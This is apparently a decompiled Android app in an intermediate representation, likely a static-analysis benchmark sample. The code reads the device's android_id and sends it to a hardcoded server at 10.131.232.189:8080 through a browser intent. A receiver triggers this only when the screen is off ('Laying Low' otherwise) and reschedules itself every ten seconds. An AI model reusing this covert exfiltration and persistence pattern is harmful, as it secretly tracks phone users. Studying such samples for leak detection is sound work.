record [|com:fgweihlp:wfgnp:HookActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.home|]    @AccessFlag PUBLIC_FINAL;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.id|]    @AccessFlag PRIVATE;
      [|java:lang:String|] [|com:fgweihlp:wfgnp:HookActivity.shelloutput|]    @AccessFlag PUBLIC;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.<init>|] ([|com:fgweihlp:wfgnp:HookActivity|] v1 @type (this)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
        v0;
      
#L02b94c.   call temp:=  [|android:app:Activity.<init>|](v1) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02b952.   v0:= "http://10.131.232.189:8080/" @type (object, string);
#L02b956.   v1.[|com:fgweihlp:wfgnp:HookActivity.home|]  := v0 @type object;
#L02b95a.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.onCreate|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|android:os:Bundle|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02b96c.   call temp:=  [|android:app:Activity.onCreate|](v4, v5) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02b972.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getContentResolver|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getContentResolver:()Landroid/content/ContentResolver;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b978.   v1:= temp  @type object;
#L02b97a.   v2:= "android_id" @type (object, string);
#L02b97e.   call temp:=  [|android:provider:Settings$Secure.getString|](v1, v2) @signature [|Landroid/provider/Settings$Secure;.getString:(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;|] @classDescriptor [|android:provider:Settings$Secure|] @type static;
#L02b984.   v1:= temp  @type object;
#L02b986.   v4.[|com:fgweihlp:wfgnp:HookActivity.id|]  := v1 @type object;
#L02b98a.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.getIntent|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.getIntent:()Landroid/content/Intent;|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02b990.   v1:= temp  @type object;
#L02b992.   call temp:=  [|android:content:Intent.getData|](v1) @signature [|Landroid/content/Intent;.getData:()Landroid/net/Uri;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02b998.   v1:= temp  @type object;
#L02b99a.   call temp:=  [|android:net:Uri.getPath|](v1) @signature [|Landroid/net/Uri;.getPath:()Ljava/lang/String;|] @classDescriptor [|android:net:Uri|] @type virtual;
#L02b9a0.   v0:= temp  @type object;
#L02b9a2.   v1:= "wfg" @type (object, string);
#L02b9a6.   v2:= new [|java:lang:StringBuilder|];
#L02b9aa.   v3:= "Action: " @type (object, string);
#L02b9ae.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02b9b4.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02b9ba.   v2:= temp  @type object;
#L02b9bc.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02b9c2.   v2:= temp  @type object;
#L02b9c4.   call temp:=  [|android:util:Log.d|](v1, v2) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02b9ca.   if v0 == 0 then goto L02ba2e;
#L02b9ce.   v1:= "Hook" @type (object, string);
#L02b9d2.   v2:= new [|java:lang:StringBuilder|];
#L02b9d6.   v3:= "Action: " @type (object, string);
#L02b9da.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02b9e0.   call temp:=  [|java:lang:StringBuilder.append|](v2, v0) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02b9e6.   v2:= temp  @type object;
#L02b9e8.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02b9ee.   v2:= temp  @type object;
#L02b9f0.   call temp:=  [|android:util:Log.i|](v1, v2) @signature [|Landroid/util/Log;.i:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02b9f6.   v1:= "/checkin" @type (object, string);
#L02b9fa.   call temp:=  [|java:lang:String.equals|](v0, v1) @signature [|Ljava/lang/String;.equals:(Ljava/lang/Object;)Z|] @classDescriptor [|java:lang:String|] @type virtual;
#L02ba00.   v1:= temp;
#L02ba02.   if v1 == 0 then goto L02ba2e;
#L02ba06.   v1:= new [|java:lang:StringBuilder|];
#L02ba0a.   v2:= "id=" @type (object, string);
#L02ba0e.   call temp:=  [|java:lang:StringBuilder.<init>|](v1, v2) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba14.   v2:= v4.[|com:fgweihlp:wfgnp:HookActivity.id|]   @type object;
#L02ba18.   call temp:=  [|java:lang:StringBuilder.append|](v1, v2) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba1e.   v1:= temp  @type object;
#L02ba20.   call temp:=  [|java:lang:StringBuilder.toString|](v1) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba26.   v1:= temp  @type object;
#L02ba28.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|](v4, v1) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba2e.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.finish|](v4) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.finish:()V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba34.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HookActivity.sendByBrowser|] ([|com:fgweihlp:wfgnp:HookActivity|] v4 @type (this), [|java:lang:String|] v5 @type (object)) @owner [|com:fgweihlp:wfgnp:HookActivity|] @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.sendByBrowser:(Ljava/lang/String;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
      
#L02ba48.   v0:= new [|android:content:Intent|];
#L02ba4c.   v1:= "android.intent.action.VIEW" @type (object, string);
#L02ba50.   v2:= new [|java:lang:StringBuilder|];
#L02ba54.   v3:= "http://10.131.232.189:8080/?" @type (object, string);
#L02ba58.   call temp:=  [|java:lang:StringBuilder.<init>|](v2, v3) @signature [|Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|java:lang:StringBuilder|] @type direct;
#L02ba5e.   call temp:=  [|java:lang:StringBuilder.append|](v2, v5) @signature [|Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba64.   v2:= temp  @type object;
#L02ba66.   call temp:=  [|java:lang:StringBuilder.toString|](v2) @signature [|Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;|] @classDescriptor [|java:lang:StringBuilder|] @type virtual;
#L02ba6c.   v2:= temp  @type object;
#L02ba6e.   call temp:=  [|android:net:Uri.parse|](v2) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02ba74.   v2:= temp  @type object;
#L02ba76.   call temp:=  [|android:content:Intent.<init>|](v0, v1, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;Landroid/net/Uri;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02ba7c.   call temp:=  [|com:fgweihlp:wfgnp:HookActivity.startActivity|](v4, v0) @signature [|Lcom/fgweihlp/wfgnp/HookActivity;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HookActivity|] @type virtual;
#L02ba82.   return @void ;

   }
record [|com:fgweihlp:wfgnp:MainActivity|]  @type class @AccessFlag PUBLIC  extends [|android:app:Activity|] {
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.<init>|] ([|com:fgweihlp:wfgnp:MainActivity|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02ba94.   call temp:=  [|android:app:Activity.<init>|](v0) @signature [|Landroid/app/Activity;.<init>:()V|] @classDescriptor [|android:app:Activity|] @type direct;
#L02ba9a.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:MainActivity.onCreate|] ([|com:fgweihlp:wfgnp:MainActivity|] v2 @type (this), [|android:os:Bundle|] v3 @type (object)) @owner [|com:fgweihlp:wfgnp:MainActivity|] @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.onCreate:(Landroid/os/Bundle;)V|] @Access PROTECTED {
      local temp ;
        v0;
        v1;
      
#L02baac.   call temp:=  [|android:app:Activity.onCreate|](v2, v3) @signature [|Landroid/app/Activity;.onCreate:(Landroid/os/Bundle;)V|] @classDescriptor [|android:app:Activity|] @type super;
#L02bab2.   v0:= new [|android:content:Intent|];
#L02bab6.   v1:= "com.fgweihlp.wfgnp.Watcher.RUN" @type (object, string);
#L02baba.   call temp:=  [|android:content:Intent.<init>|](v0, v1) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bac0.   call temp:=  [|com:fgweihlp:wfgnp:MainActivity.sendBroadcast|](v2, v0) @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.sendBroadcast:(Landroid/content/Intent;)V|] @classDescriptor [|com:fgweihlp:wfgnp:MainActivity|] @type virtual;
#L02bac6.   call temp:=  [|com:fgweihlp:wfgnp:MainActivity.finish|](v2) @signature [|Lcom/fgweihlp/wfgnp/MainActivity;.finish:()V|] @classDescriptor [|com:fgweihlp:wfgnp:MainActivity|] @type virtual;
#L02bacc.   return @void ;

   }

record [|com:fgweihlp:wfgnp:Watcher|]  @type class @AccessFlag PUBLIC  extends [|android:content:BroadcastReceiver|] {
   }
      global [|java:lang:String|] @@[|com:fgweihlp:wfgnp:Watcher.RUN|]    @AccessFlag PUBLIC_STATIC_FINAL;
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.<init>|] ([|com:fgweihlp:wfgnp:Watcher|] v0 @type (this)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.<init>:()V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02bba0.   call temp:=  [|android:content:BroadcastReceiver.<init>|](v0) @signature [|Landroid/content/BroadcastReceiver;.<init>:()V|] @classDescriptor [|android:content:BroadcastReceiver|] @type direct;
#L02bba6.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:Watcher.onReceive|] ([|com:fgweihlp:wfgnp:Watcher|] v5 @type (this), [|android:content:Context|] v6 @type (object), [|android:content:Intent|] v7 @type (object)) @owner [|com:fgweihlp:wfgnp:Watcher|] @signature [|Lcom/fgweihlp/wfgnp/Watcher;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
        v3;
        v4;
      
#L02bbb8.   v2:= "Checkin" @type (object, string);
#L02bbbc.   v3:= "Running" @type (object, string);
#L02bbc0.   call temp:=  [|android:util:Log.d|](v2, v3) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bbc6.   v2:= "power" @type (object, string);
#L02bbca.   call temp:=  [|android:content:Context.getSystemService|](v6, v2) @signature [|Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bbd0.   v1:= temp  @type object;
#L02bbd2.   v1:= ([|android:os:PowerManager|])v1;
#L02bbd6.   call temp:=  [|android:os:PowerManager.isScreenOn|](v1) @signature [|Landroid/os/PowerManager;.isScreenOn:()Z|] @classDescriptor [|android:os:PowerManager|] @type virtual;
#L02bbdc.   v2:= temp;
#L02bbde.   if v2 != 0 then goto L02bc1e;
#L02bbe2.   v2:= "Checkin" @type (object, string);
#L02bbe6.   v3:= "Activating" @type (object, string);
#L02bbea.   call temp:=  [|android:util:Log.d|](v2, v3) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bbf0.   v2:= new [|android:content:Intent|];
#L02bbf4.   v3:= "android.intent.action.VIEW" @type (object, string);
#L02bbf8.   v4:= "wfgnp://data/checkin" @type (object, string);
#L02bbfc.   call temp:=  [|android:net:Uri.parse|](v4) @signature [|Landroid/net/Uri;.parse:(Ljava/lang/String;)Landroid/net/Uri;|] @classDescriptor [|android:net:Uri|] @type static;
#L02bc02.   v4:= temp  @type object;
#L02bc04.   call temp:=  [|android:content:Intent.<init>|](v2, v3, v4) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;Landroid/net/Uri;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02bc0a.   v3:= 268435456  @length high16;
#L02bc0e.   call temp:=  [|android:content:Intent.setFlags|](v2, v3) @signature [|Landroid/content/Intent;.setFlags:(I)Landroid/content/Intent;|] @classDescriptor [|android:content:Intent|] @type virtual;
#L02bc14.   v2:= temp  @type object;
#L02bc16.   call temp:=  [|android:content:Context.startActivity|](v6, v2) @signature [|Landroid/content/Context;.startActivity:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02bc1c.   return @void ;
#L02bc1e.   v2:= "Checkin" @type (object, string);
#L02bc22.   v3:= "Laying Low" @type (object, string);
#L02bc26.   call temp:=  [|android:util:Log.d|](v2, v3) @signature [|Landroid/util/Log;.d:(Ljava/lang/String;Ljava/lang/String;)I|] @classDescriptor [|android:util:Log|] @type static;
#L02bc2c.   v0:= new [|android:os:Handler|];
#L02bc30.   call temp:=  [|android:os:Handler.<init>|](v0) @signature [|Landroid/os/Handler;.<init>:()V|] @classDescriptor [|android:os:Handler|] @type direct;
#L02bc36.   v2:= new [|com:fgweihlp:wfgnp:HlpRestart|];
#L02bc3a.   call temp:=  [|com:fgweihlp:wfgnp:HlpRestart.<init>|](v2, v6) @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @classDescriptor [|com:fgweihlp:wfgnp:HlpRestart|] @type direct;
#L02bc40.   v3:= 10000  @length wide16;
#L02bc44.   call temp:=  [|android:os:Handler.postDelayed|](v0, v2, v3, v4) @signature [|Landroid/os/Handler;.postDelayed:(Ljava/lang/Runnable;J)Z|] @classDescriptor [|android:os:Handler|] @type virtual;
#L02bc4a.   goto L02bc1c;

   }

record [|com:fgweihlp:wfgnp:HlpRestart|]  @type class @AccessFlag PUBLIC extends  [|java:lang:Runnable|] {
      [|android:content:Context|] [|com:fgweihlp:wfgnp:HlpRestart.c|]    @AccessFlag PRIVATE;
   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.<init>|] ([|com:fgweihlp:wfgnp:HlpRestart|] v0 @type (this), [|android:content:Context|] v1 @type (object)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.<init>:(Landroid/content/Context;)V|] @Access PUBLIC_CONSTRUCTOR {
      local temp ;
      
#L02b904.   call temp:=  [|java:lang:Object.<init>|](v0) @signature [|Ljava/lang/Object;.<init>:()V|] @classDescriptor [|java:lang:Object|] @type direct;
#L02b90a.   v0.[|com:fgweihlp:wfgnp:HlpRestart.c|]  := v1 @type object;
#L02b90e.   return @void ;

   }
    procedure [|void|] [|com:fgweihlp:wfgnp:HlpRestart.run|] ([|com:fgweihlp:wfgnp:HlpRestart|] v3 @type (this)) @owner [|com:fgweihlp:wfgnp:HlpRestart|] @signature [|Lcom/fgweihlp/wfgnp/HlpRestart;.run:()V|] @Access PUBLIC {
      local temp ;
        v0;
        v1;
        v2;
      
#L02b920.   v0:= v3.[|com:fgweihlp:wfgnp:HlpRestart.c|]   @type object;
#L02b924.   v1:= new [|android:content:Intent|];
#L02b928.   v2:= "com.fgweihlp.wfgnp.Watcher.RUN" @type (object, string);
#L02b92c.   call temp:=  [|android:content:Intent.<init>|](v1, v2) @signature [|Landroid/content/Intent;.<init>:(Ljava/lang/String;)V|] @classDescriptor [|android:content:Intent|] @type direct;
#L02b932.   call temp:=  [|android:content:Context.sendBroadcast|](v0, v1) @signature [|Landroid/content/Context;.sendBroadcast:(Landroid/content/Intent;)V|] @classDescriptor [|android:content:Context|] @type virtual;
#L02b938.   return @void ;

   }